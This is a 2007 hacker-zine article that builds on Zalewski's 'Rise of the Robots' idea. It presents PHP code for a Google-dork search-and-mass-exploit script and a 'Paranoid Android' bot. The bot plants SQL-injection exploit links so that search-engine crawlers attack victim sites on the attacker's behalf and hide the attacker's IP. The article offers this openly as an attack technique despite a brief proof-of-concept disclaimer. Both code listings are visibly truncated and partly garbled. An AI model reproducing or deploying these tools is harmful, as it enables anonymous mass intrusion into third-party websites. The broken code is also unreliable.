Title: I, Bot. Taking advantage of robots power. Re: "Against the System: Rise of the Robots" of Michal Zalewski Author: Crossbower - crossbower#katamail.com Site: http://www.playhack.net Date: 2007-04-18 --------------------------------------------------------------------------------- -[ SUMMARY ]--------------------------------------------------------------------- 0x00: Intro, let's start 0x01: Abstract 0x02: Implementation 0x03: The code: Paranoid Android 0x04: Conclusion --------------------------------------------------------------------------------- ---[ 0x00: Intro, let's start ] Hello to everybody. I'm very sorry for my poor english but it's not my first language. I hope you will excuse eventual errors Wink This paper wants to be a reply to an article published on Phrack by Michal Zalewski. He was the first that has assumed the possibility to take advantage by multitude of robots that every moment scanning the web to search information. We begin with the introduction to the article of Zalewski, then will see how implementing its ideas for writing ours bots. "Consider a remote exploit that is able to compromise a remote system without sending any attack code to his victim. Consider an exploit which simply creates local file to compromise thousands of computers, and which does not involve any local resources in the attack. Welcome to the world of zero-effort exploit techniques. Welcome to the world of automation, welcome to the world of anonymous, dramatically difficult to stop attacks resulting from increasing Internet complexity. Zero-effort exploits create their 'wishlist', and leave it somewhere in cyberspace - can be even its home host, in the place where others can find it. Others - Internet workers (see references, [D]) - hundreds of never sleeping, endlessly browsing information crawlers, intelligent agents, search engines... They come to pick this information, and - unknowingly - to attack victims. You can stop one of them, but can't stop them all. You can find out what their orders are, but you can't guess what these orders will be tomorrow, hidden somewhere in the abyss of not yet explored cyberspace. Your private army, close at hand, picking orders you left for them on their way. You exploit them without having to compromise them. They do what they are designed for, and they do their best to accomplish it. Welcome to the new reality, where our A.I. machines can rise against us." Now we see as all this is possible in reality Wink Have fun! -----------------------------------------------------------------------------[/] ---[ 0x01: Abstract ] The idea that the search engines (first of all Google) could be transformed in powerful arms in the hands of attackers is not new. Google hacking, search dork, cache digging, are all techniques that allow to take advantage of a minimal part of motors acquaintance, but a very few persons, till now, had thought to use their more sensitive and powerful part, the robot... and this is the topic of this article. A robot is a program that automatically traverses the Web's hypertext structure by retrieving pages or documents, and recursively retrieving all documents that are referenced. Note that "recursive" here doesn't limit the definition to any specific traversal algorithm. Even if a robot applies some heuristic to the selection and order of documents to visit and spaces out requests over a long space of time, it is still a robot. Normal Web browsers aren't robots, because they are operated by a human, and don't automatically retrieve referenced documents. Web robots are sometimes referred to as Web Wanderers, Web Crawlers, or Spiders. These names are a bit misleading because they give the impression the software itself moves between sites like a virus. This not the case, a robot simply visits sites by requesting documents from them. What kinds of robots are there? Robots can be used for a number of purposes: * Indexing * HTML validation * Link validation * "What's New" monitoring * Mirroring How many robots circulate in the web? For having a complete panoramic you can consult the list of active bot (http://www.robotstxt.org/wc/active/html/type.html). We will not deepen because this argument does not belong to the article's subject. -----------------------------------------------------------------------------[/] ---[ 0x02: Implementation ] Which are the force point of a bot? Surely the speed, the ability to execute a great number of operations in a little time.. For the exploiting we can write a bot with a function like mirroring, that with the informations found in a database or in a search engine, can complete mass penetrations without scanning a great number of useless targets. A first (and simple) implementation is this script. It can search in a search engine like google (or other..) and create an array with the addresses of sites with determined web pages. If qualified, it can exploit automatically many type of vulnerabilities (for example the sql injection). Although it is a simple script can become a destructive arm used in the mistaken way (ok noob?). I ask therefore eventual readers lamer not to use it in order to damage. It's only Proof of Concept. - - - - - code: - - - - - #!/usr/bin/php "; if ($argc<2) { echo "Usage: ".$argv[0]." Example: ".$argv[0]." /script/vuln.php?cmd= 30 "; die; } //Init... error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function SendPack($packet) { global $proxy, $host, $port, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $buffer=''; while (!feof($ock)) { $buffer.=fgets($ock); } } else { $buffer=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$buffer))) { $buffer.=fread($ock,1); } } fclose($ock); return($buffer); } //Global variables $host="www.google.com"; //Our vulnerability database ;) $path=$argv[1]; //String $port=80; //Port (Web) $proxy=""; //For your proxy $html; //Buffer for result //Google variables $SeInurl="/search?q=inurl%3A"; //Search inurl $SeType="&btnG=Search"; //Search type if ($argv[2]) $SeNumber="&num=".$argv[2]; else $SeNumber="&num=20"; //Number of result if ($path[0]<>'/') {print("*warning: string must begin with '/'\n");} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} //$path=urlencode($path); //Url encoding echo "1: Find Targets...\n\n"; //Google's inurl search (example): //http://www.google.com/search?q=inurl%3A%2Fscript%2Fvuln.php%3Fcmd%3D&num=30&btnG=Search /* Make and Send Query */ $packet ="GET ".$SeInurl.$path.$SeNumber.$SeType." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; $html=SendPack($packet); /* Find targets urls */ preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%&_/\?\=\~\-]+)#e',$html, $match); for ($i=0; $i - - - - - - - - - - -----------------------------------------------------------------------------[/] ---[ 0x03: The code: Paranoid Android ] Now we try to implement a different code. A code that uses, in a truly new way, the crawler of search engines. The operations of a crawler are simple: In general, it starts with a list of URLs to visit, called the "seeds". As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit, called the "crawl frontier". URLs from the frontier are recursively visited according to a set of policies. As we can see, this method is closely correlated to the contents of a web page, that can send it to explore other numerous links. Now we ask ourselves: how much will be sure this type of method? We suppose that visited website contains exploit links (example: sql injection) that call other dynamic pages of websites. What happens in this case? The heuristic spider follows the links and injects code to the websites. Then, it saves all result to the database of its search engine. It's not fantastic? Wink And in logs which IP does remain? The IP of the search engine, that with the many sites visited every day by its spider, will make an hard work to find our malicious site. If it is disposed to make searches… In any case if our site is uncovered, how many other searches are necessary to find the guilty? Now because the code is better than thousand words, here a robot that if configured correctly can use the techniques described in this article. Voilà Paranoid Android: - - - - - code: - - - - - Paranoid Android, By Crossbower   Automatic SaE (search-and-exploit) Bot
   by Crossbower Crossbower*katamail*com

"; //Loading... error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function SendPack($packet) { global $host, $port; $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } fputs($ock,$packet); $buffer=''; while (!feof($ock)) { $buffer.=fgets($ock); } fclose($ock); return($buffer); } //START: /* Make and Send Query */ $packet ="GET ".$SeInurl.$string.$SeNumber.$SeType." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; $html=SendPack($packet); //Open log file $handle =fopen($LogFile,'a'); //Inizialize the log fwrite($handle,"\n# ".date("D dS M, Y h:i a :")."

\n"); fwrite($handle,"Visited by:
\n"); $Spider =$REMOTE_HOST."
".$REMOTE_ADDR."
"; $Spider.=$HTTP_USER_AGENT."
".$HTTP_REFERER."
"; $Spider.=$HTTP_ACCEPT_LANGUAGE."

\n"; fwrite($handle,$Spider); fwrite($handle,"Links (google cache):
\n"); $Log ="".$match[1][$i].$exploit."
\n"; //Update log fwrite($handle,$Log.$match[1][$i].$exploit."\">".$match[1][$i].$exploit."
\n"); }} //Close log fwrite($handle,"

\n"); fclose($handle); ?> - - - - - - - - - - -----------------------------------------------------------------------------[/] ---[ 0x06: Conclusion ] I hope these informations have interested to you and they have made you to comprise the gravity of the possible attacks with robots, in future... In order to deepen you can read these documents: - "Against the System: Rise of the Robots" by Michal Zalewski http://www.phrack.org/archives/57/p57-0x13 - "The Anatomy of a Large-Scale Hypertextual Web Search Engine" Googlebot concept, Sergey Brin, Lawrence Page, Stanford University http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm - Proprietary web solutions security, Michal Zalewski http://lcamtuf.coredump.cx/milpap.txt - "A Standard for Robot Exclusion", Martijn Koster http://info.webcrawler.com/mak/projects/robots/norobots.html - "The Web Robots Database" http://www.robotstxt.org/wc/active.html http://www.robotstxt.org/wc/active/html/type.html - "Web Security FAQ", Lincoln D. Stein http://www.w3.org/Security/Faq/www-security-faq.html Ok, this is all people... For clarifications, questions and other esitate to mail me Wink Crossbower - crossbower#katamail.com Site: http://www.playhack.net -----------------------------------------------------------------------------[/]